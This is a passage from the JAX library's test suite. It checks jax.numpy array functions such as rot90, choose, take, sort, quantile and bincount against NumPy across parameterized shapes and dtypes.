[(2, 3), (1, 0)],
[(4, 3, 2), (0, 2)],
[(4, 3, 2), (2, 1)],
]
for k in range(-3, 4)
for dtype in default_dtypes))
def testRot90(self, shape, dtype, k, axes):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_op = lambda x: jnp.rot90(x, k, axes)
np_op = lambda x: np.rot90(x, k, axes)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
# TODO(mattjj): test infix operator overrides
def testRavel(self):
rng = np.random.RandomState(0)
args_maker = lambda: [rng.randn(3, 4).astype("float32")]
self._CompileAndCheck(lambda x: x.ravel(), args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_order={}_mode={}".format(
shape, order, mode),
"shape": shape, "order": order, "mode": mode}
for shape in nonempty_nonscalar_array_shapes
for order in ['C', 'F']
for mode in ['wrap', 'clip', 'raise']))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testRavelMultiIndex(self, shape, order, mode):
# generate indices in each dimension with a few out of bounds.
rngs = [jtu.rand_int(self.rng(), low=-1, high=dim + 1)
for dim in shape]
# generate multi_indices of different dimensions that broadcast.
args_maker = lambda: [tuple(rng(ndim * (3,), jnp.int_)
for ndim, rng in enumerate(rngs))]
def np_fun(x):
try:
return np.ravel_multi_index(x, shape, order=order, mode=mode)
except ValueError as err:
if str(err).startswith('invalid entry'):
# sentinel indicating expected error.
return -999
else:
raise
def jnp_fun(x):
try:
return jnp.ravel_multi_index(x, shape, order=order, mode=mode)
except ValueError as err:
if str(err).startswith('invalid entry'):
# sentinel indicating expected error.
return -999
else:
raise
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
if mode == 'raise':
msg = ("The error occurred because ravel_multi_index was jit-compiled "
"with mode='raise'. Use mode='wrap' or mode='clip' instead.")
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg):
jax.jit(jnp_fun)(*args_maker())
else:
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_ashape={}{}_cshapes={}{}_mode={}".format(
adtype.__name__, ashape, cdtype.__name__, cshapes, mode),
"ashape": ashape, "adtype": adtype, "cshapes": cshapes, "cdtype": cdtype, "mode": mode}
for ashape in ((), (4,), (3, 4))
for cshapes in [
[(), (4,)],
[(3, 4), (4,), (3, 1)]
]
for adtype in int_dtypes
for cdtype in default_dtypes
for mode in ['wrap', 'clip', 'raise']))
def testChoose(self, ashape, adtype, cshapes, cdtype, mode):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(ashape, adtype), [rng(s, cdtype) for s in cshapes]]
def np_fun(a, c):
try:
return np.choose(a, c, mode=mode)
except ValueError as err:
if mode == 'raise' and str(err).startswith('invalid entry'):
return -999 # sentinel indicating expected error.
else:
raise
def jnp_fun(a, c):
try:
return jnp.choose(a, c, mode=mode)
except ValueError as err:
if mode == 'raise' and str(err).startswith('invalid entry'):
return -999 # sentinel indicating expected error.
else:
raise
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
if mode == 'raise':
msg = ("The error occurred because jnp.choose was jit-compiled"
" with mode='raise'. Use mode='wrap' or mode='clip' instead.")
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg):
jax.jit(jnp_fun)(*args_maker())
else:
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.parameters(
(0, (2, 1, 3)),
(5, (2, 1, 3)),
(0, ()),
([0, 1, 2], (2, 2)),
([[[0, 1], [2, 3]]], (2, 2)))
def testUnravelIndex(self, flat_index, shape):
args_maker = lambda: (flat_index, shape)
self._CheckAgainstNumpy(np.unravel_index, jnp.unravel_index,
args_maker)
self._CompileAndCheck(jnp.unravel_index, args_maker)
def testUnravelIndexOOB(self):
self.assertEqual(jnp.unravel_index(2, (2,)), (1,))
self.assertEqual(jnp.unravel_index(-2, (2, 1, 3,)), (1, 0, 1))
self.assertEqual(jnp.unravel_index(-3, (2,)), (0,))
def testAstype(self):
rng = np.random.RandomState(0)
args_maker = lambda: [rng.randn(3, 4).astype("float32")]
np_op = lambda x: np.asarray(x).astype(jnp.int32)
jnp_op = lambda x: jnp.asarray(x).astype(jnp.int32)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in array_shapes
for dtype in all_dtypes))
def testNbytes(self, shape, dtype):
rng = jtu.rand_default(self.rng())
np_op = lambda x: np.asarray(x).nbytes
jnp_op = lambda x: jnp.asarray(x).nbytes
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_dtype={}".format(
jtu.format_shape_dtype_string(shape, a_dtype), dtype),
"shape": shape, "a_dtype": a_dtype, "dtype": dtype}
for shape in [(8,), (3, 8)] # last dim = 8 to ensure shape compatibility
for a_dtype in (default_dtypes + unsigned_dtypes + bool_dtypes)
for dtype in (default_dtypes + unsigned_dtypes + bool_dtypes)))
def testView(self, shape, a_dtype, dtype):
if jtu.device_under_test() == 'tpu':
if jnp.dtype(a_dtype).itemsize in [1, 2] or jnp.dtype(dtype).itemsize in [1, 2]:
self.skipTest("arr.view() not supported on TPU for 8- or 16-bit types.")
if not config.x64_enabled:
if jnp.dtype(a_dtype).itemsize == 8 or jnp.dtype(dtype).itemsize == 8:
self.skipTest("x64 types are disabled by jax_enable_x64")
rng = jtu.rand_fullrange(self.rng())
args_maker = lambda: [rng(shape, a_dtype)]
np_op = lambda x: np.asarray(x).view(dtype)
jnp_op = lambda x: jnp.asarray(x).view(dtype)
# Above may produce signaling nans; ignore warnings from invalid values.
with np.errstate(invalid='ignore'):
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
def testPathologicalFloats(self):
args_maker = lambda: [np.array([
0b_0111_1111_1000_0000_0000_0000_0000_0000, # inf
0b_1111_1111_1000_0000_0000_0000_0000_0000, # -inf
0b_0111_1111_1100_0000_0000_0000_0000_0000, # qnan
0b_1111_1111_1100_0000_0000_0000_0000_0000, # -qnan
0b_0111_1111_1000_0000_0000_0000_0000_0001, # snan
0b_1111_1111_1000_0000_0000_0000_0000_0001, # -snan
0b_0111_1111_1000_0000_0000_1100_0000_0000, # nonstandard nan
0b_1111_1111_1000_0000_0000_1100_0000_0000, # -nonstandard nan
0b_0000_0000_0000_0000_0000_0000_0000_0000, # zero
0b_1000_0000_0000_0000_0000_0000_0000_0000, # -zero
], dtype='uint32')]
np_op = lambda x: np.asarray(x).view('float32').view('uint32')
jnp_op = lambda x: jnp.asarray(x).view('float32').view('uint32')
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
# TODO(mattjj): test other ndarray-like method overrides
def testNpMean(self):
# from https://github.com/google/jax/issues/125
x = lax.add(jnp.eye(3, dtype=float), 0.)
ans = np.mean(x)
self.assertAllClose(ans, np.array(1./3), check_dtypes=False)
def testArangeOnFloats(self):
# from https://github.com/google/jax/issues/145
self.assertAllClose(np.arange(0.0, 1.0, 0.1, dtype=jnp.float_),
jnp.arange(0.0, 1.0, 0.1))
# from https://github.com/google/jax/issues/3450
self.assertAllClose(np.arange(2.5, dtype=jnp.float_),
jnp.arange(2.5))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for dtype in all_dtypes
for shape in nonzerodim_shapes
for axis in (None, *range(len(shape)))))
def testSort(self, dtype, shape, axis):
rng = jtu.rand_some_equal(self.rng())
args_maker = lambda: [rng(shape, dtype)]
jnp_fun = jnp.sort
np_fun = np.sort
if axis is not None:
jnp_fun = partial(jnp_fun, axis=axis)
np_fun = partial(np_fun, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for dtype in all_dtypes
for shape in one_dim_array_shapes
for axis in [None]))
def testSortComplex(self, dtype, shape, axis):
rng = jtu.rand_some_equal(self.rng())
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np.sort_complex, jnp.sort_complex, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp.sort_complex, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_input_type={}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype),
input_type.__name__, axis),
"shape": shape, "dtype": dtype, "input_type": input_type, "axis": axis}
for dtype in all_dtypes
for shape in nonempty_nonscalar_array_shapes
for input_type in [np.array, tuple]
for axis in (-1, *range(len(shape) - 1))))
def testLexsort(self, dtype, shape, input_type, axis):
rng = jtu.rand_some_equal(self.rng())
args_maker = lambda: [input_type(rng(shape, dtype))]
jnp_op = lambda x: jnp.lexsort(x, axis=axis)
np_op = lambda x: np.lexsort(x, axis=axis)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for dtype in all_dtypes
for shape in nonzerodim_shapes
for axis in (None, *range(len(shape)))))
def testArgsort(self, dtype, shape, axis):
rng = jtu.rand_some_equal(self.rng())
args_maker = lambda: [rng(shape, dtype)]
jnp_fun = jnp.argsort
np_fun = np.argsort
if axis is not None:
jnp_fun = partial(jnp_fun, axis=axis)
np_fun = partial(np_fun, axis=axis)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for dtype in all_dtypes
for shape in nonzerodim_shapes))
def testMsort(self, dtype, shape):
rng = jtu.rand_some_equal(self.rng())
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np.msort, jnp.msort, args_maker)
self._CompileAndCheck(jnp.msort, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_shifts={}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype),
shifts, axis),
"shape": shape, "dtype": dtype, "shifts": shifts, "axis": axis}
for dtype in all_dtypes
for shape in [(3, 4), (3, 4, 5), (7, 4, 0)]
for shifts, axis in [
(3, None),
(1, 1),
((3,), (0,)),
((-2,), (-2,)),
((1, 2), (0, -1)),
((4, 2, 5, 5, 2, 4), None),
(100, None),
]))
def testRoll(self, shape, dtype, shifts, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype), np.array(shifts)]
jnp_op = partial(jnp.roll, axis=axis)
np_op = partial(np.roll, axis=axis)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_start={}".format(
jtu.format_shape_dtype_string(shape, dtype),
axis, start),
"shape": shape, "dtype": dtype, "axis": axis,
"start": start}
for dtype in all_dtypes
for shape in [(1, 2, 3, 4)]
for axis in [-3, 0, 2, 3]
for start in [-4, -1, 2, 4]))
def testRollaxis(self, shape, dtype, start, axis):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)]
jnp_op = partial(jnp.rollaxis, axis=axis, start=start)
np_op = partial(np.rollaxis, axis=axis, start=start)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_bitorder={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis, bitorder),
"shape": shape, "dtype": dtype, "axis": axis,
"bitorder": bitorder}
for dtype in [np.uint8, np.bool_]
for bitorder in ['big', 'little']
for shape in [(1, 2, 3, 4)]
for axis in [None, 0, 1, -2, -1]))
def testPackbits(self, shape, dtype, axis, bitorder):
rng = jtu.rand_some_zero(self.rng())
args_maker = lambda: [rng(shape, dtype)]
jnp_op = partial(jnp.packbits, axis=axis, bitorder=bitorder)
np_op = partial(np.packbits, axis=axis, bitorder=bitorder)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_bitorder={}_count={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis, bitorder, count),
"shape": shape, "dtype": dtype, "axis": axis, "bitorder": bitorder,
"count": count}
for dtype in [np.uint8]
for bitorder in ['big', 'little']
for shape in [(1, 2, 3, 4)]
for axis in [None, 0, 1, -2, -1]
for count in [None, 20]))
def testUnpackbits(self, shape, dtype, axis, bitorder, count):
rng = jtu.rand_int(self.rng(), 0, 256)
args_maker = lambda: [rng(shape, dtype)]
jnp_op = partial(jnp.unpackbits, axis=axis, bitorder=bitorder)
np_op = partial(np.unpackbits, axis=axis, bitorder=bitorder)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_index={}_axis={}_mode={}".format(
jtu.format_shape_dtype_string(shape, dtype),
jtu.format_shape_dtype_string(index_shape, index_dtype),
axis, mode),
"shape": shape, "index_shape": index_shape, "dtype": dtype,
"index_dtype": index_dtype, "axis": axis, "mode": mode}
for shape in [(3,), (3, 4), (3, 4, 5)]
for index_shape in scalar_shapes + [(3,), (2, 1, 3)]
for axis in itertools.chain(range(-len(shape), len(shape)),
[cast(Optional[int], None)])
for dtype in all_dtypes
for index_dtype in int_dtypes
for mode in [None, 'wrap', 'clip']))
def testTake(self, shape, dtype, index_shape, index_dtype, axis, mode):
def args_maker():
x = rng(shape, dtype)
i = rng_indices(index_shape, index_dtype)
return x, i
rng = jtu.rand_default(self.rng())
if mode is None:
rng_indices = jtu.rand_int(self.rng(), -shape[axis or 0], shape[axis or 0])
else:
rng_indices = jtu.rand_int(self.rng(), -5, 5)
jnp_op = lambda x, i: jnp.take(x, i, axis=axis, mode=mode)
np_op = lambda x, i: np.take(x, i, axis=axis, mode=mode)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
def testTakeEmpty(self):
np.testing.assert_array_equal(
jnp.array([], dtype=jnp.float32),
jnp.take(jnp.array([], jnp.float32), jnp.array([], jnp.int32)))
np.testing.assert_array_equal(
jnp.ones((2, 0, 4), dtype=jnp.float32),
jnp.take(jnp.ones((2, 0, 4), dtype=jnp.float32), jnp.array([], jnp.int32),
axis=1))
with self.assertRaisesRegex(IndexError, "non-empty jnp.take"):
jnp.take(jnp.ones((2, 0, 4), dtype=jnp.float32),
jnp.array([0], jnp.int32), axis=1)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_index={}_axis={}".format(
jtu.format_shape_dtype_string(x_shape, dtype),
jtu.format_shape_dtype_string(i_shape, index_dtype), axis),
"x_shape": x_shape, "i_shape": i_shape, "dtype": dtype,
"index_dtype": index_dtype, "axis": axis}
for x_shape, i_shape in filter(
_shapes_are_equal_length,
filter(_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(nonempty_nonscalar_array_shapes, 2)))
for axis in itertools.chain(range(len(x_shape)), [-1],
[cast(Optional[int], None)])
for dtype in default_dtypes
for index_dtype in int_dtypes))
def testTakeAlongAxis(self, x_shape, i_shape, dtype, index_dtype, axis):
rng = jtu.rand_default(self.rng())
i_shape = np.array(i_shape)
if axis is None:
i_shape = [np.prod(i_shape, dtype=np.int64)]
else:
# Test the case where the size of the axis doesn't necessarily broadcast.
i_shape[axis] *= 3
i_shape = list(i_shape)
def args_maker():
x = rng(x_shape, dtype)
n = np.prod(x_shape, dtype=np.int32) if axis is None else x_shape[axis]
if np.issubdtype(index_dtype, np.unsignedinteger):
index_rng = jtu.rand_int(self.rng(), 0, n)
else:
index_rng = jtu.rand_int(self.rng(), -n, n)
i = index_rng(i_shape, index_dtype)
return x, i
jnp_op = lambda x, i: jnp.take_along_axis(x, i, axis=axis)
if hasattr(np, "take_along_axis"):
np_op = lambda x, i: np.take_along_axis(x, i, axis=axis)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
def testTakeAlongAxisWithUint8IndicesDoesNotOverflow(self):
# https://github.com/google/jax/issues/5088
h = jtu.rand_default(self.rng())((256, 256, 100), np.float32)
g = jtu.rand_int(self.rng(), 0, 100)((256, 256, 1), np.uint8)
q0 = jnp.take_along_axis(h, g, axis=-1)
q1 = np.take_along_axis( h, g, axis=-1)
np.testing.assert_equal(q0, q1)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_n={}_increasing={}".format(
jtu.format_shape_dtype_string([shape], dtype),
n, increasing),
"dtype": dtype, "shape": shape, "n": n, "increasing": increasing}
for dtype in inexact_dtypes
for shape in [0, 5]
for n in [2, 4]
for increasing in [False, True]))
def testVander(self, shape, dtype, n, increasing):
rng = jtu.rand_default(self.rng())
def np_fun(arg):
arg = arg.astype(np.float32) if dtype == jnp.bfloat16 else arg
return np.vander(arg, N=n, increasing=increasing)
jnp_fun = lambda arg: jnp.vander(arg, N=n, increasing=increasing)
args_maker = lambda: [rng([shape], dtype)]
# np.vander seems to return float64 for all floating types. We could obey
# those semantics, but they seem like a bug.
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol={np.float32: 1e-3})
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(
"nan_to_num", [shape], [dtype]),
"shape": shape, "dtype": dtype}
for shape in array_shapes
for dtype in inexact_dtypes))
def testNanToNum(self, shape, dtype):
rng = jtu.rand_some_inf_and_nan(self.rng())
dtype = np.dtype(dtypes.canonicalize_dtype(dtype)).type
def np_fun(x):
if dtype == jnp.bfloat16:
x = np.where(np.isnan(x), dtype(0), x)
x = np.where(np.isposinf(x), jnp.finfo(dtype).max, x)
x = np.where(np.isneginf(x), jnp.finfo(dtype).min, x)
return x
else:
return np.nan_to_num(x).astype(dtype)
args_maker = lambda: [rng(shape, dtype)]
check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
self._CheckAgainstNumpy(np_fun, jnp.nan_to_num, args_maker,
check_dtypes=check_dtypes)
self._CompileAndCheck(jnp.nan_to_num, args_maker,
check_dtypes=check_dtypes)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix("ix_", shapes, dtypes),
"shapes": shapes, "dtypes": dtypes}
for shapes, dtypes in (
((), ()),
(((7,),), (np.int32,)),
(((3,), (4,)), (np.int32, np.int32)),
(((3,), (1,), (4,)), (np.int32, np.int32, np.int32)),
)))
def testIx_(self, shapes, dtypes):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype)
for shape, dtype in zip(shapes, dtypes)]
self._CheckAgainstNumpy(np.ix_, jnp.ix_, args_maker)
self._CompileAndCheck(jnp.ix_, args_maker)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_dimensions={}_dtype={}_sparse={}".format(
dimensions, dtype, sparse),
"dimensions": dimensions, "dtype": dtype, "sparse": sparse}
for dimensions in [(), (2,), (3, 0), (4, 5, 6)]
for dtype in number_dtypes
for sparse in [True, False]))
def testIndices(self, dimensions, dtype, sparse):
def args_maker(): return []
np_fun = partial(np.indices, dimensions=dimensions,
dtype=dtype, sparse=sparse)
jnp_fun = partial(jnp.indices, dimensions=dimensions,
dtype=dtype, sparse=sparse)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name":
"_op={}_a_shape={}_q_shape={}_axis={}_keepdims={}_interpolation={}".format(
op,
jtu.format_shape_dtype_string(a_shape, a_dtype),
jtu.format_shape_dtype_string(q_shape, q_dtype),
axis, keepdims, interpolation),
"a_rng": jtu.rand_some_nan,
"q_rng": q_rng, "op": op,
"a_shape": a_shape, "a_dtype": a_dtype,
"q_shape": q_shape, "q_dtype": q_dtype, "axis": axis,
"keepdims": keepdims,
"interpolation": interpolation}
for (op, q_rng) in (
("percentile", partial(jtu.rand_uniform, low=0., high=100.)),
("quantile", partial(jtu.rand_uniform, low=0., high=1.)),
("nanpercentile", partial(jtu.rand_uniform, low=0., high=100.)),
("nanquantile", partial(jtu.rand_uniform, low=0., high=1.)),
)
for a_dtype in default_dtypes
for a_shape, axis in (
((7,), None),
((47, 7), 0),
((4, 101), 1),
)
for q_dtype in [np.float32]
for q_shape in scalar_shapes + [(4,)]
for keepdims in [False, True]
for interpolation in ['linear', 'lower', 'higher', 'nearest',
'midpoint']))
def testQuantile(self, op, a_rng, q_rng, a_shape, a_dtype, q_shape, q_dtype,
axis, keepdims, interpolation):
a_rng = a_rng(self.rng())
q_rng = q_rng(self.rng())
if "median" in op:
args_maker = lambda: [a_rng(a_shape, a_dtype)]
else:
args_maker = lambda: [a_rng(a_shape, a_dtype), q_rng(q_shape, q_dtype)]
def np_fun(*args):
args = [x if jnp.result_type(x) != jnp.bfloat16 else
np.asarray(x, np.float32) for x in args]
return getattr(np, op)(*args, axis=axis, keepdims=keepdims,
interpolation=interpolation)
jnp_fun = partial(getattr(jnp, op), axis=axis, keepdims=keepdims,
interpolation=interpolation)
# TODO(phawkins): we currently set dtype=False because we aren't as
# aggressive about promoting to float64. It's not clear we want to mimic
# Numpy here.
tol_spec = {np.float32: 2e-4, np.float64: 5e-6}
tol = max(jtu.tolerance(a_dtype, tol_spec),
jtu.tolerance(q_dtype, tol_spec))
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name":
"_{}_a_shape={}_axis={}_keepdims={}".format(
op, jtu.format_shape_dtype_string(a_shape, a_dtype),
axis, keepdims),
"op": op, "a_shape": a_shape, "a_dtype": a_dtype,
"axis": axis,
"keepdims": keepdims}
for a_dtype in default_dtypes
for a_shape, axis in (
((7,), None),
((47, 7), 0),
((4, 101), 1),
)
for keepdims in [False, True]
for op in ["median", "nanmedian"]))
def testMedian(self, op, a_shape, a_dtype, axis, keepdims):
if op == "median":
a_rng = jtu.rand_default(self.rng())
else:
a_rng = jtu.rand_some_nan(self.rng())
args_maker = lambda: [a_rng(a_shape, a_dtype)]
def np_fun(*args):
args = [x if jnp.result_type(x) != jnp.bfloat16 else
np.asarray(x, np.float32) for x in args]
return getattr(np, op)(*args, axis=axis, keepdims=keepdims)
jnp_fun = partial(getattr(jnp, op), axis=axis, keepdims=keepdims)
# TODO(phawkins): we currently set dtype=False because we aren't as
# aggressive about promoting to float64. It's not clear we want to mimic
# Numpy here.
tol_spec = {np.float32: 2e-4, np.float64: 5e-6}
tol = jtu.tolerance(a_dtype, tol_spec)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in all_shapes for dtype in all_dtypes))
def testWhereOneArgument(self, shape, dtype):
rng = jtu.rand_some_zero(self.rng())
np_fun = lambda x: np.where(x)
np_fun = jtu.ignore_warning(
category=DeprecationWarning,
message="Calling nonzero on 0d arrays.*")(np_fun)
jnp_fun = lambda x: jnp.where(x)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
# JIT compilation requires specifying a size statically. Full test of
# this behavior is in testNonzeroSize().
jnp_fun = lambda x: jnp.where(x, size=np.size(x) // 2)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
"testcase_name": "_{}".format("_".join(
jtu.format_shape_dtype_string(shape, dtype)
for shape, dtype in zip(shapes, dtypes))),
"shapes": shapes, "dtypes": dtypes
} for shapes in s(filter(_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(all_shapes, 3)))
for dtypes in s(itertools.combinations_with_replacement(all_dtypes, 3)))))
def testWhereThreeArgument(self, shapes, dtypes):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, shapes, dtypes)
def np_fun(cond, x, y):
return _promote_like_jnp(partial(np.where, cond))(x, y)
self._CheckAgainstNumpy(np_fun, jnp.where, args_maker)
self._CompileAndCheck(jnp.where, args_maker)
def testWhereScalarPromotion(self):
x = jnp.where(jnp.array([True, False]), 3,
jnp.ones((2,), dtype=jnp.float32))
self.assertEqual(x.dtype, np.dtype(np.float32))
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
"testcase_name": jtu.format_test_name_suffix("", shapes, (np.bool_,) * n + dtypes),
"shapes": shapes, "dtypes": dtypes
} for n in s(range(1, 3))
for shapes in s(filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(all_shapes, 2 * n + 1)))
for dtypes in s(itertools.combinations_with_replacement(all_dtypes, n + 1)))))
def testSelect(self, shapes, dtypes):
rng = jtu.rand_default(self.rng())
n = len(dtypes) - 1
def args_maker():
condlist = [rng(shape, np.bool_) for shape in shapes[:n]]
choicelist = [rng(shape, dtype)
for shape, dtype in zip(shapes[n:-1], dtypes[:n])]
default = rng(shapes[-1], dtypes[-1])
return condlist, choicelist, default
# TODO(phawkins): float32/float64 type mismatches
def np_fun(condlist, choicelist, default):
choicelist = [x if jnp.result_type(x) != jnp.bfloat16
else x.astype(np.float32) for x in choicelist]
dtype = jnp.result_type(default, *choicelist)
return np.select(condlist,
[np.asarray(x, dtype=dtype) for x in choicelist],
np.asarray(default, dtype=dtype))
self._CheckAgainstNumpy(np_fun, jnp.select, args_maker,
check_dtypes=False)
self._CompileAndCheck(jnp.select, args_maker,
rtol={np.float64: 1e-7, np.complex128: 1e-7})
def testIssue330(self):
x = jnp.full((1, 1), jnp.array([1])[0]) # doesn't crash
self.assertEqual(x[0, 0], 1)
def testScalarDtypePromotion(self):
orig_numpy_result = (1 + np.eye(1, dtype=np.float32)).dtype
jax_numpy_result = (1 + jnp.eye(1, dtype=jnp.float32)).dtype
self.assertEqual(orig_numpy_result, jax_numpy_result)
def testSymmetrizeDtypePromotion(self):
x = np.eye(3, dtype=np.float32)
orig_numpy_result = ((x + x.T) / 2).dtype
x = jnp.eye(3, dtype=jnp.float32)
jax_numpy_result = ((x + x.T) / 2).dtype
self.assertEqual(orig_numpy_result, jax_numpy_result)
# NOTE(mattjj): I disabled this test when removing lax._safe_mul because
# introducing the convention 0 * inf = 0 leads to silently wrong results in
# some cases. See this comment for details:
# https://github.com/google/jax/issues/1052#issuecomment-514083352
# def testIssue347(self):
# # https://github.com/google/jax/issues/347
# def test_fail(x):
# x = jnp.sqrt(jnp.sum(x ** 2, axis=1))
# ones = jnp.ones_like(x)
# x = jnp.where(x > 0.5, x, ones)
# return jnp.sum(x)
# x = jnp.array([[1, 2], [3, 4], [0, 0]], dtype=jnp.float64)
# result = api.grad(test_fail)(x)
# assert not np.any(np.isnan(result))
def testIssue453(self):
# https://github.com/google/jax/issues/453
a = np.arange(6) + 1
ans = jnp.reshape(a, (3, 2), order='F')
expected = np.reshape(a, (3, 2), order='F')
self.assertAllClose(ans, expected)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_op={}_dtype={}".format(op, pytype.__name__),
"pytype": pytype, "dtype": dtype, "op": op}
for pytype, dtype in [(int, jnp.int_), (float, jnp.float_),
(bool, jnp.bool_), (complex, jnp.complex_)]
for op in ["atleast_1d", "atleast_2d", "atleast_3d"]))
def testAtLeastNdLiterals(self, pytype, dtype, op):
# Fixes: https://github.com/google/jax/issues/634
np_fun = lambda arg: getattr(np, op)(arg).astype(dtype)
jnp_fun = lambda arg: getattr(jnp, op)(arg)
args_maker = lambda: [pytype(2)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{
"testcase_name": "_shape={}_dtype={}_weights={}_minlength={}_length={}".format(
shape, dtype, weights, minlength, length
),
"shape": shape,
"dtype": dtype,
"weights": weights,
"minlength": minlength,
"length": length}
for shape in [(0,), (5,), (10,)]
for dtype in int_dtypes
for weights in [True, False]
for minlength in [0, 20]
for length in [None, 10]
))
def testBincount(self, shape, dtype, weights, minlength, length):
rng = jtu.rand_positive(self.rng())
args_maker = lambda: (rng(shape, dtype), (rng(shape, 'float32') if weights else None))
np_fun = partial(np.bincount, minlength=minlength)
jnp_fun = partial(jnp.bincount, minlength=minlength, length=length)
if length is not None:
self._CompileAndCheck(jnp_fun, args_maker)
if length is None:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
